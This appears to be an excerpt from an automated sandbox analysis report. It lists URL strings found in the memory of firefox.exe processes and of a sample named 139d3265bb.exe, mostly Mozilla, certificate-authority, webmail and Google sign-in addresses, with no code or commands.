Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespacehttp://mozilla.org/#/properties/bra
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/cbhStudyRow
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/cbhStudyUs
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabledhttp://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/extraParams
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemsThe
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRRaddonsSearchDetection.onSearchEngineModified
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/insecureFallbackhttp://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/networkPredictoraddons-search-detection
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priorityhttp://mozilla.org/#/properties/br
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/branches/anyOf/2http
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/richSuggestionsFeatureGate
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/serpEventTelemetryEnabled
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/showImportAll
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/trendingEnabled
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/trendingMaxResultsNoSearchMode
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/trendingRequireSearchMode
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/useNewWizard
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000019.00000003.1924178853.000001EBF369F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000019.00000003.2029190205.000001EBFEC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1952395153.000001EBFE391000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2029493789.000001EBFEC52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1952261425.000001EBFF737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2005204486.000001EBFE38B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1606110741.000001EBF21C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2034674809.000001EBFEC10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2032646292.000001EBFEC79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2014148406.000001EBFD41F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1678051944.000001EBF21C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562913345.000001EBF1953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1668187024.000001EBF1CD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1678422307.000001EBF1951000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1952395153.000001EBFE3CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2014148406.000001EBFD469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1947196375.000001EBFE0C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2029493789.000001EBFEC87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2054633291.000001EBF20CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1682874417.000001EBF1B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2007756649.000001EBF20EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2015701743.000001EBF92DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000019.00000003.1972043932.000001EBF13E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1966895160.000001EBF1412000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1968357533.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13E9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967714144.000001EBF1432000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: firefox.exe, 00000019.00000003.1968832824.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972439281.000001EBF140C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1975654553.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972224946.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13F2000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: firefox.exe, 00000019.00000003.1966895160.000001EBF1412000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1926066661.000001EBFDEAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000019.00000003.1968832824.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972439281.000001EBF140C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1975654553.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972224946.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1967758085.000001EBF140B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1972043932.000001EBF13F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000019.00000003.1924804040.000001EBFDEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1926066661.000001EBFDEAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1937675261.000001EBFE000000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.25.dr	String found in binary or memory: http://www.mozilla.com0
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000019.00000003.1683593546.000001EBF155D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000019.00000003.1681595879.000001EBF3ECD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1655997633.000001EBF3ECD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000019.00000003.1561927088.000001EBF184A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562303877.000001EBF1875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1560793169.000001EBF1600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000019.00000003.1653540755.000001EBF45A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000019.00000003.2074022692.000001EBFE099000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2068804466.000001EBFE092000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000019.00000003.1948557177.000001EBFDF30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: firefox.exe, 00000017.00000002.1501078585.000002201EE91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts
Source: firefox.exe, 0000001F.00000002.3715973641.000002FB910F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715081178.000002FB90DFA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3711817551.000001E51A2D4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3713346875.000001E51A2FA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3713346875.000001E51A2F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://accounts.google.co
Source: 139d3265bb.exe, 00000015.00000002.1500521068.0000000001791000.00000004.00000020.00020000.00000000.sdmp, 139d3265bb.exe, 00000015.00000003.1498027544.0000000001791000.00000004.00000020.00020000.00000000.sdmp, 139d3265bb.exe, 00000015.00000002.1500009629.0000000001768000.00000004.00000020.00020000.00000000.sdmp, 139d3265bb.exe, 00000015.00000003.1498027544.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, 139d3265bb.exe, 00000015.00000002.1500521068.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.1499596934.000002201EE8C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.1501078585.000002201EE9B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.1499674063.000002201EE9A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2050084473.000001EBF3539000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2006608844.000001EBF2188000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2021860556.000001EBF3539000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2045167517.000001EBF219D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2051277653.000001EBF353C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: 139d3265bb.exe, 00000015.00000002.1500521068.0000000001791000.00000004.00000020.00020000.00000000.sdmp, 139d3265bb.exe, 00000015.00000003.1498027544.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd;;
Source: 139d3265bb.exe, 00000015.00000002.1500521068.00000000017A1000.00000004.00000020.00020000.00000000.sdmp, 139d3265bb.exe, 00000015.00000003.1498027544.00000000017A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwdx
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/resource://activity-stream/common/Acti
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/screen
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/resource://activity-stream/lib/ToolbarP
Source: firefox.exe, 00000019.00000003.2090847544.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2074183845.000001EBFE00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
